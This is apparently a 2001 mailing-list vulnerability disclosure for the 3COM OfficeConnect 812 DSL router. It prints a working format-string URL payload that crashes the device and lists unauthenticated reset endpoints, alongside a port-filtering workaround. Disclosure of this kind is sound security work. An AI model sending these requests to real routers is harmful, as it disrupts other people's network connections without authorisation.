3COM OfficeConnect DSL router vulneratibilities

["inc" <ix_lsd () hotmail com>]

Yesterday night I discovered a vulnerabilty. The router is a 3COM
OfficeConnect 812 and the vulnerability is on the HTTP server, on port 80.
When you enter with a browser on one of this router, you are asked for
user/password, if you fail, you can see a web page telling you that is a
protected objetct, but you have a .GIF file you have access to and you dont
need to put the .GIF.

http://192.168.1.254/graphics/sml3com

well... you put this, and you see the image...

well.... lets add a long string later

Exploit:
--------

http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s

...the router causes an NMI, red lights, flashing lights... and it's dead...
it disconnect and come online again on a minute.

3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts
on almost DSL connections, even for all short of businness. They are selling
now this router even when is a better firmware (not tested yet) that maybe
resolve this problem.

Solution: put filters to the router to the remote sites and only allow
connections to 23 and 80 from local network. If you're spanish, take care
cos your IP is fixed and you have a very "clear" domain 195.255.*.* and
217.97.*.*

Not Copyrighted by UnMateria - May 2001 :-)


ANNEX:

http://192.168.1.254/adsl_pair_select
http://192.168.1.254/adsl_reset

Very unsecure for strangers ;-)... the server here doesnt ask for password
so you cant reset the router from the own web (and without credentials)